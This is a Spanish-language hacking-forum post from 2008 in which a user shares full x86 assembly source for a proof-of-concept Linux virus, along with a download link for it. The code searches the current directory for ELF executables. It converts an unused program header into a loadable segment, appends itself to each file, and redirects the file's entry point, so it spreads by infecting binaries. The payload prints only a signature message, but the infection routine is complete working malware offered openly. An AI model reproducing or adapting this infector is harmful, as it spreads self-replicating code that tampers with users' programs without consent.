elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 00:00  


Tema destacado: Grupo de Facebook de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Virus para Linux		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Virus para Linux  (Leído 1,118 veces)
Purple-Cat

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Virus para Linux
« en: 14 Febrero 2008, 21:13 »
Hola, bueno aquí les dejo mi primer virus para linux, cuando tenga tiempo comentaré más el código. Infecta los elf ejecutables de la carpeta actual, para eso modifica una program header type 6 por una type 1 q carga el virus, y modifica el entry point. Acá tienen:

http://www.galeon.com/purplecat/PurpleCat.zip

Código:

BITS 32
GLOBAL main
SECTION .text

system EQU 0x80
standart_output EQU 1
read_and_write EQU 2
SEEK_SET EQU 0
SEEK_CUR EQU 1
SEEK_END EQU 2
new_line EQU 10

sys_exit EQU 1
sys_read EQU 3
sys_write EQU 4
sys_open EQU 5
sys_close EQU 6
sys_lseek EQU 19
sys_readdir EQU 89
sys_getcwd EQU 183

main:
pushad
pushfd
call Virus
popfd
popad
jmp Host

Virus:
Start:
pop eax
push eax

push ebp
mov ebp, esp
sub esp, 512

mov dword [ebp - 4], eax ;We have in [ebp - 4] the virtual address (delta offset) of the virus.

mov ecx, 256
lea ebx, [ebp - 256]
mov eax, sys_getcwd
int system

xor edx, edx
xor ecx, ecx
lea ebx, [ebp - 256]
mov eax, sys_open
int system
test eax, eax
js Exit
mov dword [ebp - 8], eax ;We have in [ebp - 8] the handle of current path.
jmp Find_file

Exit:
jmp Payload

Close_file:
mov ebx, [ebp - 12]
mov eax, sys_close
int system

Find_file:
lea ecx, [ebp - 274]
mov ebx, [ebp - 8]
mov eax, sys_readdir
int system
test eax, eax
jz Exit

mov ecx, read_and_write
lea ebx, [ebp - 264]
mov eax, sys_open
int system
test eax, eax
js Find_file
mov [ebp - 12], eax ;We have in [ebp - 12] the handle of the file we are going to check.

mov edx, 52
lea ecx, [ebp - 64]
mov ebx, [ebp - 12]
mov eax, sys_read
int system
test eax, eax
js Close_file

mov eax, [ebp - 64]
cmp eax, 0x464C457F
jnz Close_file

mov eax, [ebp - 60]
cmp eax, 0x00010101
jnz Close_file

mov ax, [ebp - 48]
cmp ax, 0x0002
jnz Close_file

mov eax, [ebp - 46]
cmp eax, 0x00010003
jnz Close_file

Infect_file:
mov cx, [ebp - 20]
test cx, cx
jz Close_file

mov eax, [ebp - 40]
mov [ebp - 16], eax ;We have in [ebp - 16] the entry point of the program.

and ecx, 0x0000FFFF
mov ebx, [ebp - 36]
mov [ebp - 20], ebx ;We have in [ebp - 20] the offset of the first program header.

Check_ph:
push ecx

mov edx, SEEK_SET
mov ecx, [ebp - 20]
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov edx, 32
lea ecx, [ebp - 52]
mov ebx, [ebp - 12]
mov eax, sys_read
int system
cmp dword [ebp - 52], 6
jz Unused_ph

add dword [ebp - 20], 32
pop ecx
loop Check_ph

jmp Close_file

Unused_ph:
mov edx, SEEK_END
mov ecx, 0
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system
mov [ebp - 24], eax ;We have in [ebp - 24] the size of the file.








mov edx, End_virus - main
mov ecx, [ebp - 4]
sub ecx, 7
mov ebx, [ebp - 12]
mov eax, sys_write
int system







mov edx, SEEK_SET
mov ecx, [ebp - 24]
add ecx, 10
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov eax, [ebp - 16]
sub eax, 0x2000000E
sub eax, [ebp - 24]
mov [ebp - 28], eax

mov edx, 4
lea ecx, [ebp - 28]
mov ebx, [ebp - 12]
mov eax, sys_write
int system










mov edx, SEEK_SET
mov ecx, [ebp - 20]
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov eax, [ebp - 24]
add eax, End_virus - main

mov dword [ebp - 56], 0x00000001
mov dword [ebp - 52], 0x00000000
mov dword [ebp - 48], 0x20000000
mov dword [ebp - 44], 0x20000000
mov dword [ebp - 40], eax
mov dword [ebp - 36], eax
mov dword [ebp - 32], 0x00000007
mov dword [ebp - 28], 0x00001000

mov edx, 32
lea ecx, [ebp - 56]
mov ebx, [ebp - 12]
mov eax, sys_write
int system

mov edx, SEEK_SET
mov ecx, 24
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov eax, [ebp - 24]
add eax, 0x20000000
mov dword [ebp - 28], eax

mov edx, 4
lea ecx, [ebp - 28]
mov ebx, [ebp - 12]
mov eax, sys_write
int system

jmp Close_file

Payload:

mov dword [ebp - 76], 'Hi, '
mov dword [ebp - 72], 'this'
mov dword [ebp - 68], ' is '
mov dword [ebp - 64], 'a pr'
mov dword [ebp - 60], 'oof '
mov dword [ebp - 56], 'of c'
mov dword [ebp - 52], 'once'
mov dword [ebp - 48], 'pt v'
mov dword [ebp - 44], 'irus'
mov dword [ebp - 40], ', by'
mov dword [ebp - 36], ' Pur'
mov dword [ebp - 32], 'ple '
mov dword [ebp - 28], 'Cat:'
mov dword [ebp - 24], ' pur'
mov dword [ebp - 20], 'ple-'
mov dword [ebp - 16], 'cat@'
mov dword [ebp - 12], 'hotm'
mov dword [ebp - 8], 'ail.'
mov dword [ebp - 4], 'es' + new_line*256*256

mov edx, 75
lea ecx, [ebp - 76]
mov ebx, standart_output
mov eax, sys_write
int system

leave
ret

End_virus:

Host:
mov edx, 21
mov ecx, Host_message
mov ebx, standart_output
mov eax, sys_write
int system

mov eax, sys_exit
int system

SECTION .data
Host_message db "The host is running!", new_line
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines